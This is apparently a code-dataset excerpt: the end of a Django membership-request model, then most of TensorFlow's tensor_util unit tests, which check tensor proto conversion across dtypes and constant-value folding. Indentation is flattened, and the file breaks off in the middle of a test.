'''A request for membership is tied to a team.
A user is granted access if the owner grants him/her permission.
'''
user = models.ForeignKey(User)
team = models.ForeignKey(Team)
created_at = models.DateTimeField('date of request', auto_now_add=True)
status = models.CharField(max_length=200, null=False,
verbose_name="Status of request",
default="pending",choices=REQUEST_CHOICES)
def __str__(self):
return "<%s:%s>" %(self.user,self.team.name)
def __unicode__(self):
return "<%s:%s>" %(self.user,self.team.name)
def get_label(self):
return "users"
class Meta:
app_label = 'users'
unique_together = (("user", "team"),)
| mit | -7,754,442,776,888,561,000 | 40.209677 | 131 | 0.604436 | false |
zasdfgbnm/tensorflow | tensorflow/python/framework/tensor_util_test.py | 1 | 37338 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for tensor_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_state_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class TensorUtilTest(test.TestCase):
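  # Round-trip tests: make_tensor_proto builds a TensorProto and MakeNdarray
  # converts it back to a numpy array with the expected dtype and values.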
def testFloat(self):
value = 10.0
t = tensor_util.make_tensor_proto(value)
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape {}
float_val: %.1f
""" % value, t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array(value, dtype=np.float32), a)
def testFloatN(self):
t = tensor_util.make_tensor_proto([10.0, 20.0, 30.0])
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "A \000\000A\240\000\000A\360\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "\000\000 A\000\000\240A\000\000\360A"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array([10.0, 20.0, 30.0], dtype=np.float32), a)
def testFloatTyped(self):
t = tensor_util.make_tensor_proto([10.0, 20.0, 30.0], dtype=dtypes.float32)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "A \000\000A\240\000\000A\360\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "\000\000 A\000\000\240A\000\000\360A"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array([10.0, 20.0, 30.0], dtype=np.float32), a)
def testFloatTypeCoerce(self):
t = tensor_util.make_tensor_proto([10, 20, 30], dtype=dtypes.float32)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "A \000\000A\240\000\000A\360\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "\000\000 A\000\000\240A\000\000\360A"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array([10.0, 20.0, 30.0], dtype=np.float32), a)
def testFloatTypeCoerceNdarray(self):
arr = np.asarray([10, 20, 30], dtype="int")
t = tensor_util.make_tensor_proto(arr, dtype=dtypes.float32)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "A \000\000A\240\000\000A\360\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "\000\000 A\000\000\240A\000\000\360A"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array([10.0, 20.0, 30.0], dtype=np.float32), a)
def testFloatSizes(self):
t = tensor_util.make_tensor_proto([10.0, 20.0, 30.0], shape=[1, 3])
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 1 } dim { size: 3 } }
tensor_content: "A \000\000A\240\000\000A\360\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 1 } dim { size: 3 } }
tensor_content: "\000\000 A\000\000\240A\000\000\360A"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array([[10.0, 20.0, 30.0]], dtype=np.float32), a)
def testFloatSizes2(self):
t = tensor_util.make_tensor_proto([10.0, 20.0, 30.0], shape=[3, 1])
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } dim { size: 1 } }
tensor_content: "A \000\000A\240\000\000A\360\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } dim { size: 1 } }
tensor_content: "\000\000 A\000\000\240A\000\000\360A"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array([[10.0], [20.0], [30.0]], dtype=np.float32), a)
def testFloatSizesLessValues(self):
t = tensor_util.make_tensor_proto(10.0, shape=[1, 3])
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 1 } dim { size: 3 } }
float_val: 10.0
""", t)
# No conversion to Ndarray for this one: not enough values.
def testFloatNpArrayFloat64(self):
t = tensor_util.make_tensor_proto(
np.array([[10.0, 20.0, 30.0]], dtype=np.float64))
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_DOUBLE
tensor_shape { dim { size: 1 } dim { size: 3 } }
tensor_content: "@$\000\000\000\000\000\000@4\000\000\000\000\000\000@>\000\000\000\000\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_DOUBLE
tensor_shape { dim { size: 1 } dim { size: 3 } }
tensor_content: "\000\000\000\000\000\000$@\000\000\000\000\000\0004@\000\000\000\000\000\000>@"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float64, a.dtype)
self.assertAllClose(
np.array([[10.0, 20.0, 30.0]], dtype=np.float64),
tensor_util.MakeNdarray(t))
def testFloatTypesWithImplicitRepeat(self):
for dtype, nptype in [(dtypes.float32, np.float32),
(dtypes.float64, np.float64)]:
t = tensor_util.make_tensor_proto([10.0], shape=[3, 4], dtype=dtype)
a = tensor_util.MakeNdarray(t)
self.assertAllClose(
np.array(
[[10.0, 10.0, 10.0, 10.0],
[10.0, 10.0, 10.0, 10.0],
[10.0, 10.0, 10.0, 10.0]],
dtype=nptype),
a)
def testFloatMutateArray(self):
t = tensor_util.make_tensor_proto([10.0, 20.0, 30.0], dtype=dtypes.float32)
a = tensor_util.MakeNdarray(t)
a[0] = 5.0
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array([5.0, 20.0, 30.0], dtype=np.float32), a)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "A \000\000A\240\000\000A\360\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "\000\000 A\000\000\240A\000\000\360A"
""", t)
def testHalf(self):
t = tensor_util.make_tensor_proto(np.array([10.0, 20.0], dtype=np.float16))
self.assertProtoEquals("""
dtype: DT_HALF
tensor_shape {
dim {
size: 2
}
}
half_val: 18688
half_val: 19712
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float16, a.dtype)
self.assertAllClose(np.array([10.0, 20.0], dtype=np.float16), a)
def testInt(self):
t = tensor_util.make_tensor_proto(10)
self.assertProtoEquals("""
dtype: DT_INT32
tensor_shape {}
int_val: 10
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.int32, a.dtype)
self.assertAllClose(np.array(10, dtype=np.int32), a)
def testLargeInt(self):
value = np.iinfo(np.int64).max
t = tensor_util.make_tensor_proto(value)
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape {}
int64_val: %d
""" % value, t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.int64, a.dtype)
self.assertAllClose(np.array(value, dtype=np.int64), a)
def testLargeNegativeInt(self):
# We don't use the min np.int64 value here
# because it breaks np.abs().
#
# np.iinfo(np.int64).min = -9223372036854775808
# np.iinfo(np.int64).max = 9223372036854775807
# np.abs(-9223372036854775808) = -9223372036854775808
value = np.iinfo(np.int64).min + 1
t = tensor_util.make_tensor_proto(value)
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape {}
int64_val: %d
""" % value, t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.int64, a.dtype)
self.assertAllClose(np.array(value, dtype=np.int64), a)
def testIntNDefaultType(self):
t = tensor_util.make_tensor_proto([10, 20, 30, 40], shape=[2, 2])
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_INT32
tensor_shape { dim { size: 2 } dim { size: 2 } }
tensor_content: "\000\000\000\\n\000\000\000\024\000\000\000\036\000\000\000("
""", t)
else:
self.assertProtoEquals("""
dtype: DT_INT32
tensor_shape { dim { size: 2 } dim { size: 2 } }
tensor_content: "\\n\000\000\000\024\000\000\000\036\000\000\000(\000\000\000"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.int32, a.dtype)
self.assertAllClose(np.array([[10, 20], [30, 40]], dtype=np.int32), a)
def testIntTypes(self):
for dtype, nptype in [(dtypes.int32, np.int32),
(dtypes.uint8, np.uint8),
(dtypes.uint16, np.uint16),
(dtypes.int16, np.int16),
(dtypes.int8, np.int8)]:
# Test with array.
t = tensor_util.make_tensor_proto([10, 20, 30], dtype=dtype)
self.assertEquals(dtype, t.dtype)
self.assertProtoEquals("dim { size: 3 }", t.tensor_shape)
a = tensor_util.MakeNdarray(t)
self.assertEquals(nptype, a.dtype)
self.assertAllClose(np.array([10, 20, 30], dtype=nptype), a)
# Test with ndarray.
t = tensor_util.make_tensor_proto(np.array([10, 20, 30], dtype=nptype))
self.assertEquals(dtype, t.dtype)
self.assertProtoEquals("dim { size: 3 }", t.tensor_shape)
a = tensor_util.MakeNdarray(t)
self.assertEquals(nptype, a.dtype)
self.assertAllClose(np.array([10, 20, 30], dtype=nptype), a)
def testIntTypesWithImplicitRepeat(self):
for dtype, nptype in [(dtypes.int64, np.int64),
(dtypes.int32, np.int32),
(dtypes.uint8, np.uint8),
(dtypes.uint16, np.uint16),
(dtypes.int16, np.int16),
(dtypes.int8, np.int8)]:
self.assertAllEqual(
np.array(
[[10, 10, 10, 10],
[10, 10, 10, 10],
[10, 10, 10, 10]],
dtype=nptype),
tensor_util.MakeNdarray(
tensor_util.make_tensor_proto(
[10],
shape=[3, 4],
dtype=dtype)))
def testIntMixedWithDimension(self):
# Github issue: 11974
dtype = dtypes.int32
nptype = np.int32
t = tensor_util.make_tensor_proto(
[10, tensor_shape.Dimension(20), 30], dtype=dtype)
self.assertEquals(dtype, t.dtype)
a = tensor_util.MakeNdarray(t)
self.assertEquals(nptype, a.dtype)
self.assertAllClose(np.array([10, 20, 30], dtype=nptype), a)
def testLong(self):
t = tensor_util.make_tensor_proto(10, dtype=dtypes.int64)
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape {}
int64_val: 10
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.int64, a.dtype)
self.assertAllClose(np.array(10, dtype=np.int64), a)
def testLongN(self):
t = tensor_util.make_tensor_proto(
[10, 20, 30], shape=[1, 3], dtype=dtypes.int64)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape { dim { size: 1 } dim { size: 3 } }
tensor_content: "\000\000\000\000\000\000\000\\n\000\000\000\000\000\000\000\024\000\000\000\000\000\000\000\036"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape { dim { size: 1 } dim { size: 3 } }
tensor_content: "\\n\000\000\000\000\000\000\000\024\000\000\000\000\000\000\000\036\000\000\000\000\000\000\000"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.int64, a.dtype)
self.assertAllClose(np.array([[10, 20, 30]], dtype=np.int64), a)
def testLongNpArray(self):
t = tensor_util.make_tensor_proto(np.array([10, 20, 30]))
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape { dim { size: 3 } }
tensor_content: "\000\000\000\000\000\000\000\\n\000\000\000\000\000\000\000\024\000\000\000\000\000\000\000\036"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape { dim { size: 3 } }
tensor_content: "\\n\000\000\000\000\000\000\000\024\000\000\000\000\000\000\000\036\000\000\000\000\000\000\000"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.int64, a.dtype)
self.assertAllClose(np.array([10, 20, 30], dtype=np.int64), a)
def testQuantizedTypes(self):
# Test with array.
data = [(21,), (22,), (23,)]
t = tensor_util.make_tensor_proto(data, dtype=dtypes.qint32)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_QINT32
tensor_shape { dim { size: 3 } }
tensor_content: "\000\000\000\025\000\000\000\026\000\000\000\027"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_QINT32
tensor_shape { dim { size: 3 } }
tensor_content: "\025\000\000\000\026\000\000\000\027\000\000\000"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(dtypes.qint32.as_numpy_dtype, a.dtype)
self.assertAllEqual(np.array(data, dtype=a.dtype), a)
t = tensor_util.make_tensor_proto(data, dtype=dtypes.quint8)
self.assertProtoEquals("""
dtype: DT_QUINT8
tensor_shape { dim { size: 3 } }
tensor_content: "\025\026\027"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(dtypes.quint8.as_numpy_dtype, a.dtype)
self.assertAllEqual(np.array(data, dtype=a.dtype), a)
t = tensor_util.make_tensor_proto(data, dtype=dtypes.qint8)
self.assertProtoEquals("""
dtype: DT_QINT8
tensor_shape { dim { size: 3 } }
tensor_content: "\025\026\027"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(dtypes.qint8.as_numpy_dtype, a.dtype)
self.assertAllEqual(np.array(data, dtype=a.dtype), a)
t = tensor_util.make_tensor_proto(data, dtype=dtypes.quint16)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_QUINT16
tensor_shape { dim { size: 3 } }
tensor_content: "\000\025\000\026\000\027"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_QUINT16
tensor_shape { dim { size: 3 } }
tensor_content: "\025\000\026\000\027\000"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(dtypes.quint16.as_numpy_dtype, a.dtype)
self.assertAllEqual(np.array(data, dtype=a.dtype), a)
t = tensor_util.make_tensor_proto(data, dtype=dtypes.qint16)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_QINT16
tensor_shape { dim { size: 3 } }
tensor_content: "\000\025\000\026\000\027"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_QINT16
tensor_shape { dim { size: 3 } }
tensor_content: "\025\000\026\000\027\000"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(dtypes.qint16.as_numpy_dtype, a.dtype)
self.assertAllEqual(np.array(data, dtype=a.dtype), a)
def testString(self):
t = tensor_util.make_tensor_proto("foo")
self.assertProtoEquals("""
dtype: DT_STRING
tensor_shape {}
string_val: "foo"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.object, a.dtype)
self.assertEquals([b"foo"], a)
def testStringWithImplicitRepeat(self):
t = tensor_util.make_tensor_proto("f", shape=[3, 4])
a = tensor_util.MakeNdarray(t)
self.assertAllEqual(np.array([[b"f"] * 4] * 3, dtype=np.object), a)
def testStringN(self):
t = tensor_util.make_tensor_proto([b"foo", b"bar", b"baz"], shape=[1, 3])
self.assertProtoEquals("""
dtype: DT_STRING
tensor_shape { dim { size: 1 } dim { size: 3 } }
string_val: "foo"
string_val: "bar"
string_val: "baz"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.object, a.dtype)
self.assertAllEqual(np.array([[b"foo", b"bar", b"baz"]]), a)
def testStringNpArray(self):
t = tensor_util.make_tensor_proto(
np.array([[b"a", b"ab"], [b"abc", b"abcd"]]))
self.assertProtoEquals("""
dtype: DT_STRING
tensor_shape { dim { size: 2 } dim { size: 2 } }
string_val: "a"
string_val: "ab"
string_val: "abc"
string_val: "abcd"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.object, a.dtype)
self.assertAllEqual(np.array([[b"a", b"ab"], [b"abc", b"abcd"]]), a)
def testArrayMethod(self):
class Wrapper(object):
def __array__(self):
return np.array([b"foo", b"bar", b"baz"])
t = tensor_util.make_tensor_proto(Wrapper(), shape=[1, 3])
self.assertProtoEquals("""
dtype: DT_STRING
tensor_shape { dim { size: 1 } dim { size: 3 } }
string_val: "foo"
string_val: "bar"
string_val: "baz"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.object, a.dtype)
self.assertAllEqual(np.array([[b"foo", b"bar", b"baz"]]), a)
def testArrayInterface(self):
class Wrapper(object):
@property
def __array_interface__(self):
return np.array([b"foo", b"bar", b"baz"]).__array_interface__
t = tensor_util.make_tensor_proto(Wrapper(), shape=[1, 3])
self.assertProtoEquals("""
dtype: DT_STRING
tensor_shape { dim { size: 1 } dim { size: 3 } }
string_val: "foo"
string_val: "bar"
string_val: "baz"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.object, a.dtype)
self.assertAllEqual(np.array([[b"foo", b"bar", b"baz"]]), a)
def testStringTuple(self):
t = tensor_util.make_tensor_proto((b"a", b"ab", b"abc", b"abcd"))
self.assertProtoEquals("""
dtype: DT_STRING
tensor_shape { dim { size: 4 } }
string_val: "a"
string_val: "ab"
string_val: "abc"
string_val: "abcd"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.object, a.dtype)
self.assertAllEqual(np.array((b"a", b"ab", b"abc", b"abcd")), a)
def testStringNestedTuple(self):
t = tensor_util.make_tensor_proto(((b"a", b"ab"), (b"abc", b"abcd")))
self.assertProtoEquals("""
dtype: DT_STRING
tensor_shape { dim { size: 2 } dim { size: 2 } }
string_val: "a"
string_val: "ab"
string_val: "abc"
string_val: "abcd"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.object, a.dtype)
self.assertAllEqual(np.array(((b"a", b"ab"), (b"abc", b"abcd"))), a)
def testComplex64(self):
t = tensor_util.make_tensor_proto((1 + 2j), dtype=dtypes.complex64)
self.assertProtoEquals("""
dtype: DT_COMPLEX64
tensor_shape {}
scomplex_val: 1
scomplex_val: 2
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.complex64, a.dtype)
self.assertAllEqual(np.array(1 + 2j), a)
def testComplex128(self):
t = tensor_util.make_tensor_proto((1 + 2j), dtype=dtypes.complex128)
self.assertProtoEquals("""
dtype: DT_COMPLEX128
tensor_shape {}
dcomplex_val: 1
dcomplex_val: 2
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.complex128, a.dtype)
self.assertAllEqual(np.array(1 + 2j), a)
def testComplexWithImplicitRepeat(self):
for dtype, np_dtype in [(dtypes.complex64, np.complex64),
(dtypes.complex128, np.complex128)]:
t = tensor_util.make_tensor_proto((1 + 1j), shape=[3, 4], dtype=dtype)
a = tensor_util.MakeNdarray(t)
self.assertAllClose(
np.array(
[[(1 + 1j), (1 + 1j), (1 + 1j), (1 + 1j)],
[(1 + 1j), (1 + 1j), (1 + 1j), (1 + 1j)],
[(1 + 1j), (1 + 1j), (1 + 1j), (1 + 1j)]],
dtype=np_dtype),
a)
def testComplex64N(self):
t = tensor_util.make_tensor_proto(
[(1 + 2j), (3 + 4j), (5 + 6j)], shape=[1, 3], dtype=dtypes.complex64)
self.assertProtoEquals("""
dtype: DT_COMPLEX64
tensor_shape { dim { size: 1 } dim { size: 3 } }
scomplex_val: 1
scomplex_val: 2
scomplex_val: 3
scomplex_val: 4
scomplex_val: 5
scomplex_val: 6
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.complex64, a.dtype)
self.assertAllEqual(np.array([[(1 + 2j), (3 + 4j), (5 + 6j)]]), a)
def testComplex128N(self):
t = tensor_util.make_tensor_proto(
[(1 + 2j), (3 + 4j), (5 + 6j)], shape=[1, 3], dtype=dtypes.complex128)
self.assertProtoEquals("""
dtype: DT_COMPLEX128
tensor_shape { dim { size: 1 } dim { size: 3 } }
dcomplex_val: 1
dcomplex_val: 2
dcomplex_val: 3
dcomplex_val: 4
dcomplex_val: 5
dcomplex_val: 6
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.complex128, a.dtype)
self.assertAllEqual(np.array([[(1 + 2j), (3 + 4j), (5 + 6j)]]), a)
def testComplex64NpArray(self):
t = tensor_util.make_tensor_proto(
np.array([[(1 + 2j), (3 + 4j)], [(5 + 6j), (7 + 8j)]]),
dtype=dtypes.complex64)
# scomplex_val are real_0, imag_0, real_1, imag_1, ...
self.assertProtoEquals("""
dtype: DT_COMPLEX64
tensor_shape { dim { size: 2 } dim { size: 2 } }
scomplex_val: 1
scomplex_val: 2
scomplex_val: 3
scomplex_val: 4
scomplex_val: 5
scomplex_val: 6
scomplex_val: 7
scomplex_val: 8
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.complex64, a.dtype)
self.assertAllEqual(
np.array([[(1 + 2j), (3 + 4j)], [(5 + 6j), (7 + 8j)]]), a)
def testComplex128NpArray(self):
t = tensor_util.make_tensor_proto(
np.array([[(1 + 2j), (3 + 4j)], [(5 + 6j), (7 + 8j)]]),
dtype=dtypes.complex128)
    # dcomplex_val are real_0, imag_0, real_1, imag_1, ...
self.assertProtoEquals("""
dtype: DT_COMPLEX128
tensor_shape { dim { size: 2 } dim { size: 2 } }
dcomplex_val: 1
dcomplex_val: 2
dcomplex_val: 3
dcomplex_val: 4
dcomplex_val: 5
dcomplex_val: 6
dcomplex_val: 7
dcomplex_val: 8
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.complex128, a.dtype)
self.assertAllEqual(
np.array([[(1 + 2j), (3 + 4j)], [(5 + 6j), (7 + 8j)]]), a)
def testUnsupportedDTypes(self):
with self.assertRaises(TypeError):
tensor_util.make_tensor_proto(np.array([1]), 0)
with self.assertRaises(TypeError):
tensor_util.make_tensor_proto(3, dtype=dtypes.qint8)
with self.assertRaises(TypeError):
tensor_util.make_tensor_proto([3], dtype=dtypes.qint8)
# Validate the helpful error message when trying to convert an
# unconvertible list as strings.
with self.assertRaisesRegexp(TypeError, "Failed to convert object"):
tensor_util.make_tensor_proto([tensor_shape.Dimension(1)])
def testTensorShapeVerification(self):
array = np.array([[1], [2]])
correct_shape = (2, 1)
incorrect_shape = (1, 2)
tensor_util.make_tensor_proto(array, shape=correct_shape, verify_shape=True)
with self.assertRaises(TypeError):
tensor_util.make_tensor_proto(
array, shape=incorrect_shape, verify_shape=True)
def testShapeTooLarge(self):
with self.assertRaises(ValueError):
tensor_util.make_tensor_proto(np.array([1, 2]), shape=[1])
def testLowRankSupported(self):
t = tensor_util.make_tensor_proto(np.array(7))
self.assertProtoEquals("""
dtype: DT_INT64
tensor_shape {}
int64_val: 7
""", t)
def testShapeEquals(self):
t = tensor_util.make_tensor_proto([10, 20, 30, 40], shape=[2, 2])
self.assertTrue(tensor_util.ShapeEquals(t, [2, 2]))
self.assertTrue(tensor_util.ShapeEquals(t, (2, 2)))
self.assertTrue(
tensor_util.ShapeEquals(t, tensor_shape.as_shape([2, 2]).as_proto()))
self.assertFalse(tensor_util.ShapeEquals(t, [5, 3]))
self.assertFalse(tensor_util.ShapeEquals(t, [1, 4]))
self.assertFalse(tensor_util.ShapeEquals(t, [4]))
def testMockArray(self):
class MockArray(object):
def __init__(self, array):
self.array = array
def __array__(self, dtype=None):
return np.asarray(self.array, dtype)
with self.test_session() as sess:
ma = MockArray(np.array([10, 20, 30]))
t = ops.convert_to_tensor(ma)
a = sess.run(t)
self.assertEquals(np.int64, a.dtype)
self.assertAllClose(np.array([10, 20, 30], dtype=np.int64), a)
class ConstantValueTest(test.TestCase):
def testConstant(self):
np_val = np.random.rand(3, 4, 7).astype(np.float32)
tf_val = constant_op.constant(np_val)
self.assertAllClose(np_val, tensor_util.constant_value(tf_val))
np_val = np.random.rand(3, 0, 7).astype(np.float32)
tf_val = constant_op.constant(np_val)
self.assertAllClose(np_val, tensor_util.constant_value(tf_val))
def testUnknown(self):
tf_val = gen_state_ops._variable(
shape=[3, 4, 7],
dtype=dtypes.float32,
name="tf_val",
container="",
shared_name="")
self.assertIs(None, tensor_util.constant_value(tf_val))
def testShape(self):
np_val = np.array([1, 2, 3], dtype=np.int32)
tf_val = array_ops.shape(constant_op.constant(0.0, shape=[1, 2, 3]))
c_val = tensor_util.constant_value(tf_val)
self.assertAllEqual(np_val, c_val)
self.assertEqual(np.int32, c_val.dtype)
def testFill(self):
np_val = np.array([-1, -1, -1], dtype=np.float32)
tf_val = array_ops.fill([3], constant_op.constant(-1.0))
c_val = tensor_util.constant_value(tf_val)
self.assertAllEqual(np_val, c_val)
self.assertEqual(np.float32, c_val.dtype)
def testSize(self):
tf_val = array_ops.size(constant_op.constant(0.0, shape=[1, 2, 3]))
c_val = tensor_util.constant_value(tf_val)
self.assertEqual(6, c_val)
def testSizeOfScalar(self):
tf_val = array_ops.size(constant_op.constant(0.0))
c_val = tensor_util.constant_value(tf_val)
self.assertEqual(1, c_val)
self.assertEqual(np.ndarray, type(c_val))
def testRank(self):
tf_val = array_ops.rank(constant_op.constant(0.0, shape=[1, 2, 3]))
c_val = tensor_util.constant_value(tf_val)
self.assertEqual(np.ndarray, type(c_val))
self.assertEqual((), c_val.shape)
self.assertEqual(3, c_val)
# Repeat test using array_ops.rank_internal to avoid the optimization that
# happens in the rank function.
tf_val = array_ops.rank_internal(
constant_op.constant(
0.0, shape=[1, 2, 3]), optimize=False)
c_val = tensor_util.constant_value(tf_val)
self.assertEqual(np.ndarray, type(c_val))
self.assertEqual((), c_val.shape)
self.assertEqual(3, c_val)
self.assertEqual([3], c_val)
def testCast(self):
np_val = np.random.rand(3, 4, 7).astype(np.float32)
tf_val = math_ops.cast(constant_op.constant(np_val), dtypes.float64)
c_val = tensor_util.constant_value(tf_val)
self.assertAllClose(np_val.astype(np.float64), c_val)
np_val = np.random.rand(3, 0, 7).astype(np.float32)
tf_val = math_ops.cast(constant_op.constant(np_val), dtypes.float64)
c_val = tensor_util.constant_value(tf_val)
self.assertAllClose(np_val.astype(np.float64), c_val)
def testConcat(self):
np_val = np.random.rand(3, 4, 7).astype(np.float32)
tf_val = array_ops.concat(
[np_val[0:1, :, :], np_val[1:2, :, :], np_val[2:3, :, :]], 0)
c_val = tensor_util.constant_value(tf_val)
self.assertAllClose(np_val, c_val)
tf_val = array_ops.concat(
[np_val[0, :, :], np_val[1, :, :], np_val[2, :, :]],
array_ops.placeholder(dtypes.int32))
c_val = tensor_util.constant_value(tf_val)
self.assertIs(None, c_val)
tf_val = array_ops.concat([
np_val[0, :, :], array_ops.placeholder(dtypes.float32), np_val[2, :, :]
], 1)
c_val = tensor_util.constant_value(tf_val)
self.assertIs(None, c_val)
def testPack_Axis0(self):
inputs = [np.random.rand(4, 7) for _ in range(3)]
np_val = np.array(inputs)
tf_val = array_ops.stack(inputs)
c_val = tensor_util.constant_value(tf_val)
self.assertAllClose(np_val, c_val)
tf_val = array_ops.stack(
[inputs[0], array_ops.placeholder(dtypes.float32), inputs[2]])
c_val = tensor_util.constant_value(tf_val)
self.assertIs(None, c_val)
def testPack_Axis1(self):
inputs = [np.random.rand(4, 7) for _ in range(3)]
tf_val = array_ops.stack(inputs, axis=1)
c_val = tensor_util.constant_value(tf_val)
self.assertIsNone(c_val)
tf_val = array_ops.stack(
[inputs[0], array_ops.placeholder(dtypes.float32), inputs[2]], axis=1)
c_val = tensor_util.constant_value(tf_val)
self.assertIs(None, c_val)
def testPack_Partial_Axis0(self):
input_ = np.random.rand(4, 7)
tf_val = array_ops.stack([input_, array_ops.placeholder(dtypes.float32)])
c_val = tensor_util.constant_value(tf_val, partial=True)
self.assertAllClose(input_, c_val[0])
self.assertIsNone(c_val[1])
def testPack_Partial_Axis1(self):
input_ = np.random.rand(4, 7)
tf_val = array_ops.stack([input_, array_ops.placeholder(dtypes.float32)],
axis=1)
c_val = tensor_util.constant_value(tf_val, partial=True)
self.assertIsNone(c_val)
def testEqual(self):
# Scalar inputs.
tf_val = math_ops.equal(constant_op.constant(1), constant_op.constant(1))
self.assertEqual(tensor_util.constant_value(tf_val), True)
tf_val = math_ops.equal(constant_op.constant(1), constant_op.constant(0))
self.assertEqual(tensor_util.constant_value(tf_val), False)
# Shaped inputs with broadcast semantics.
tf_val = math_ops.equal(constant_op.constant([[0, 1]]),
constant_op.constant([[0], [1]]))
c_val = tensor_util.constant_value(tf_val)
self.assertAllEqual(c_val, [[True, False], [False, True]])
def testNotEqual(self):
# Scalar inputs.
tf_val = math_ops.not_equal(constant_op.constant(1),
